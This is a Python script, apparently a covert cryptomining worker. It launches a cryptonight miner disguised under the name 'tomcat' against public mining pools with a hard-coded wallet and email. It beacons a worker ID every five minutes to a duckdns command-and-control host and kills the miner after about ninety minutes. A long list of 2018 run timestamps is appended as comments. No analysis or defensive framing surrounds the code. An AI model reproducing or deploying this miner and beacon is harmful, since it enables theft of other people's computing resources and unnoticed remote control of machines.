import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:03.925425
#2018-02-17 16:58:04.935667
#2018-02-17 18:47:02.127283
#2018-02-17 20:36:01.246363
#2018-02-17 22:22:04.386580
#2018-02-18 00:06:04.126045
#2018-02-18 01:56:07.196429
#2018-02-18 03:44:01.459539
#2018-02-18 05:32:05.725577
#2018-02-18 07:24:05.312737
#2018-02-18 09:12:04.163455
#2018-02-18 10:58:06.474624
#2018-02-18 12:45:03.126190
#2018-02-18 14:34:06.305778
#2018-02-18 16:25:06.263775
#2018-02-18 18:15:07.132745
#2018-02-18 20:01:02.908283
#2018-02-18 21:48:04.945083
#2018-02-18 23:37:03.496095
#2018-02-19 01:23:04.115132
#2018-02-19 03:11:06.575635
#2018-02-19 04:56:04.520145
#2018-02-19 06:40:06.854936
#2018-02-19 08:30:01.400333
#2018-02-19 10:19:01.900918
#2018-02-19 12:07:04.552046
#2018-02-19 13:53:04.437863
#2018-02-19 15:43:07.405379
#2018-02-19 17:31:06.626769
#2018-02-19 19:18:07.050316
#2018-02-19 21:07:08.047178
#2018-02-19 22:54:06.700048
#2018-02-20 00:37:07.116967
#2018-02-20 02:26:04.144253
#2018-02-20 04:16:06.619657
#2018-02-20 05:59:07.142612
#2018-02-20 07:44:04.996341
#2018-02-20 09:28:06.767236
#2018-02-20 11:12:06.738411
#2018-02-20 12:59:09.824759
#2018-02-20 14:43:04.695710
#2018-02-20 16:33:04.820605
#2018-02-20 18:19:06.553630
#2018-02-20 20:10:02.159285
#2018-02-20 21:58:05.644368
#2018-02-20 23:38:04.383433
#2018-02-21 01:21:05.963634
#2018-02-21 03:09:03.894394
#2018-02-21 04:57:07.763018
#2018-02-21 06:44:03.872265
#2018-02-21 08:32:01.983983
#2018-02-21 10:18:01.377697
#2018-02-21 12:05:10.398183
#2018-02-21 13:54:05.978544
#2018-02-21 15:38:06.894214
#2018-02-21 17:31:02.009487
#2018-02-21 19:17:01.769279
#2018-02-21 21:04:07.789158
#2018-02-21 22:51:06.361781
#2018-02-22 00:40:05.531146
#2018-02-22 02:28:04.903804
#2018-02-22 04:15:07.312023
#2018-02-22 06:02:08.464039
#2018-02-22 07:47:06.723298
#2018-02-22 09:35:05.806990
#2018-02-22 11:19:09.808863
#2018-02-22 13:05:07.409960
#2018-02-22 14:52:07.740600
#2018-02-22 16:37:08.411534
#2018-02-22 18:23:08.613345
#2018-02-22 20:14:07.917719
#2018-02-22 22:01:05.367638
#2018-02-22 23:47:07.051490
#2018-02-23 01:34:01.791613
#2018-02-23 03:19:05.751013
#2018-02-23 05:05:01.345407
#2018-02-23 06:49:03.632586
#2018-02-23 08:39:01.665199
#2018-02-23 10:54:06.208964
#2018-02-23 12:51:01.652670
#2018-02-23 14:36:09.024360
#2018-02-23 16:24:09.738496
#2018-02-23 18:11:07.908536
#2018-02-23 19:56:07.683266
#2018-02-23 21:41:01.383318
#2018-02-23 23:31:01.369191
#2018-02-24 01:21:04.993453
#2018-02-24 03:13:05.381889
#2018-02-24 04:58:06.446966
#2018-02-24 06:48:02.176242
#2018-02-24 08:39:01.544551
#2018-02-24 10:23:07.106455
#2018-02-24 12:18:07.271253
#2018-02-24 14:11:04.434246
#2018-02-24 15:58:03.527256
#2018-02-24 17:49:04.175418
#2018-02-24 19:37:06.930339
#2018-02-24 21:24:03.519378
#2018-02-25 01:16:05.416801
#2018-02-25 05:12:07.036397
#2018-02-25 10:55:01.559272